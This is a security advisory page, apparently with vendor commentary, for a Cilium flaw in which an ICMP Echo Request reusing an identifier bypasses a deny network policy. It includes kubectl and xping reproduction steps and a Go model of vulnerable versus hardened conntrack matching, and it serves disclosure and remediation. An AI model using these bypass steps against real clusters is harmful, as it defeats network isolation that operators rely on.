Summary
Detailed description
See https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x).
Example
$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: server-netpol # allow client->server
spec:
  podSelector:
    matchLabels:
      run: server
  ingress:
  - from:
    - podSelector:
        matchLabels:
          run: client
  policyTypes:
  - Ingress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: client-netpol # deny any->client
spec:
  podSelector:
    matchLabels:
      run: client
  policyTypes:
  - Ingress
EOF
xping is the ping variant shipped in the net-test image; its -x flag sets the ICMP identifier, and using the same identifier (666) in both directions is what the bypass depends on.
$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
^C
--- 10.154.0.50 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss <--- "client-netpol" policy denied
command terminated with exit code 1
$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP
PING 10.154.1.16 (10.154.1.16): 56 data bytes
64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms
--- 10.154.1.16 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss <--- "server-netpol" policy allowed
round-trip min/avg/max = 0.822/0.822/0.822 ms
$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms
--- 10.154.0.50 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss <--- "client-netpol" policy bypassed
round-trip min/avg/max = 0.527/0.527/0.527 ms
For more information
If you have any questions or comments about this advisory:
- Open an issue in Cilium Issues
- Email us at [email protected]
Impact
Under certain conditions, an ICMP Echo Request sent to a Cilium endpoint by an actor may bypass a network policy that denies access from the actor to the endpoint while allowing access from the endpoint to the actor. This does NOT apply to UDP or TCP traffic.
The actor is either a pod, a cluster host or a remote host.
The following conditions must all be met:
1. Network policies have been created which:
   a) do not allow access from the actor to the endpoint;
   b) allow access from the endpoint to the actor and specify neither protocol nor port.
2. The endpoint has sent an ICMP Echo Request to the actor with ICMP identifier X.
3. The actor sends an ICMP Echo Request to the endpoint with the same ICMP identifier X.
4. The request from the actor (3.) arrives before Cilium's conntrack GC has removed the conntrack entry created by (2.).
ICMP echo has no ports, so the conntrack entry created by the endpoint's own Echo Request is keyed on the identifier alone; the actor's Echo Request carrying the same identifier matches the reply direction of that entry and is treated as established traffic instead of being checked against the endpoint's ingress policy.
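The following is an added, simplified model of the conntrack matching described above, written for this page; it is not Cilium's BPF datapath code. It replays the three pings from the example against two endpoints with the example's policies, once with matching that lets any ICMP echo packet on the reverse tuple pass as established (the bypass) and once with matching that only accepts an Echo Reply as the reply half of an echo flow. Endpoint names, the key shape and the Strict flag are assumptions made for the example.

```go
package main

import "fmt"

// ICMP types used by the model.
const (
	EchoReply   uint8 = 0
	EchoRequest uint8 = 8
)

// Packet is an ICMP echo packet reduced to the fields the model needs.
type Packet struct {
	Src, Dst string
	Type     uint8
	ID       uint16 // ICMP identifier: echo has no ports, so this is the only flow discriminator
}

// ctKey models a conntrack key for an ICMP echo flow (assumed shape, not Cilium's).
type ctKey struct {
	Initiator, Responder string
	ID                   uint16
}

// Endpoint holds one endpoint's ingress policy and its own conntrack table.
type Endpoint struct {
	Name      string
	AllowFrom map[string]bool // ingress allow list; empty means deny all ingress
	Strict    bool            // false: vulnerable matching, true: hardened matching
	ct        map[ctKey]bool  // entries created by this endpoint's own egress traffic
}

func NewEndpoint(name string, strict bool, allowFrom ...string) *Endpoint {
	e := &Endpoint{Name: name, Strict: strict, AllowFrom: map[string]bool{}, ct: map[ctKey]bool{}}
	for _, a := range allowFrom {
		e.AllowFrom[a] = true
	}
	return e
}

// SendEcho records an egress Echo Request in conntrack. Egress is assumed to be
// allowed with no protocol or port restriction (condition 1b in the advisory).
func (e *Endpoint) SendEcho(dst string, id uint16) Packet {
	e.ct[ctKey{e.Name, dst, id}] = true
	return Packet{Src: e.Name, Dst: dst, Type: EchoRequest, ID: id}
}

// ExpireCT models conntrack GC removing the entry, so condition 4 no longer holds.
func (e *Endpoint) ExpireCT(dst string, id uint16) { delete(e.ct, ctKey{e.Name, dst, id}) }

// Receive decides whether an ingress packet is accepted.
func (e *Endpoint) Receive(p Packet) bool {
	// Reverse lookup: does this packet sit on the reply direction of a flow we initiated?
	if e.ct[ctKey{p.Dst, p.Src, p.ID}] {
		// Vulnerable: any echo packet on the reverse tuple passes as established,
		// including an Echo Request, so the ingress policy is never consulted.
		// Hardened: only an Echo Reply is the reply half of an echo flow; an
		// Echo Request is a new flow and falls through to ingress policy.
		if !e.Strict || p.Type == EchoReply {
			return true
		}
	}
	return e.AllowFrom[p.Src]
}

// Reproduce replays the three pings from the example and reports whether each was
// accepted: [server->client, client->server, server->client again].
func Reproduce(strict bool) [3]bool {
	client := NewEndpoint("client", strict)           // client-netpol: deny any->client
	server := NewEndpoint("server", strict, "client") // server-netpol: allow client->server

	first := client.Receive(server.SendEcho("client", 666))  // denied by client-netpol
	second := server.Receive(client.SendEcho("server", 666)) // allowed by server-netpol; creates CT on client
	third := client.Receive(server.SendEcho("client", 666))  // same identifier: bypass unless strict
	return [3]bool{first, second, third}
}

// ReplyStillAccepted checks that hardened matching still lets a genuine reply through.
func ReplyStillAccepted() bool {
	client := NewEndpoint("client", true)
	client.SendEcho("server", 666)
	return client.Receive(Packet{Src: "server", Dst: "client", Type: EchoReply, ID: 666})
}

// BypassWithoutStrict exercises conditions 3 and 4 under vulnerable matching: the
// bypass needs the same identifier and an entry that GC has not yet removed.
func BypassWithoutStrict(sameID, expired bool) bool {
	client := NewEndpoint("client", false)
	server := NewEndpoint("server", false, "client")
	client.SendEcho("server", 666)
	if expired {
		client.ExpireCT("server", 666)
	}
	id := uint16(666)
	if !sameID {
		id = 667
	}
	return client.Receive(server.SendEcho("client", id))
}

func main() {
	fmt.Println("vulnerable matching:", Reproduce(false)) // [false true true]
	fmt.Println("hardened matching:  ", Reproduce(true))  // [false true false]
}
```

The third result is the one the example's final xping shows: with vulnerable matching it flips to accepted purely because the identifier matches an entry the client created, and it goes back to denied once the identifier differs or the entry has been garbage-collected.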
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Upgrade github.com/cilium/cilium to 1.7.15 or later (1.7.x), 1.8.8 or later (1.8.x), or 1.9.5 or later (1.9.x).
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-C66W-HQ56-4Q97? GHSA-C66W-HQ56-4Q97 is a low-severity security vulnerability in github.com/cilium/cilium (go), affecting versions >= 1.7.8, <= 1.7.14. It is fixed in 1.7.15, 1.8.8 and 1.9.5.
- Which versions of github.com/cilium/cilium are affected by GHSA-C66W-HQ56-4Q97? github.com/cilium/cilium (go) versions >= 1.7.8, <= 1.7.14 are affected. The fix was also backported to the 1.8.x and 1.9.x branches (see the commits above), so releases before 1.8.8 and 1.9.5 should be treated as affected as well.
- Is there a fix for GHSA-C66W-HQ56-4Q97? Yes. GHSA-C66W-HQ56-4Q97 is fixed in 1.7.15, 1.8.8 and 1.9.5. Upgrade to the fixed release for your minor version or later.
- Is GHSA-C66W-HQ56-4Q97 exploitable, and should I be worried? Whether GHSA-C66W-HQ56-4Q97 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether GHSA-C66W-HQ56-4Q97 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-C66W-HQ56-4Q97?
  - Upgrade github.com/cilium/cilium to 1.7.15 or later
  - Upgrade github.com/cilium/cilium to 1.8.8 or later
  - Upgrade github.com/cilium/cilium to 1.9.5 or later